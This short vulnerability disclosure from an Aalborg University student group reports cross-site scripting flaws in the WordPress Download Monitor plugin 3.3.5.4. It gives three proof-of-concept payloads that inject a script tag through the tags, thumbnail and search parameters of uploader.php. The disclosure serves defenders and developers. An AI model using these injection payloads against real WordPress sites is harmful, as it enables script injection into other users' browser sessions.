WordPress Download Monitor plugin version 3.3.5.4 suffers from a cross site scripting vulnerability.
1f4d185b80123fbf8df66916397b96e0618c037e026207693f3fc9e0f7db1cdd
Hi
We have used our tool, THAPS, to identify vulnerabilities in this WordPress plugin.
We have confirmed at least one of the reported vulnerabilities and created a working exploit located below.
Attached is one or more log files containing the output of our tool, identifying the location of the vulnerabilities which might help the developers locate the issue.
Module: Wordpress Download Monitor
Version: 3.3.5.4
Confirmed exploits:
EXPLOIT
http://wp.bacon/wp-content/plugins/download-monitor/uploader.php?tab=add
tags="><script>alert(1)</script>
EXPLOIT
http://wp.bacon/wp-content/plugins/download-monitor/uploader.php?tab=add
thumbnail="><script>alert(1)</script>
EXPLOIT
http://wp.bacon/wp-content/plugins/download-monitor/uploader.php?tab=downloads&s=%22%3E%3Cscript%3Ealert%281%29%3C/script%3E
Best Regards
Heine Pedersen and Torben Jensen
Student project group: sw101f12
Aalborg University
Denmark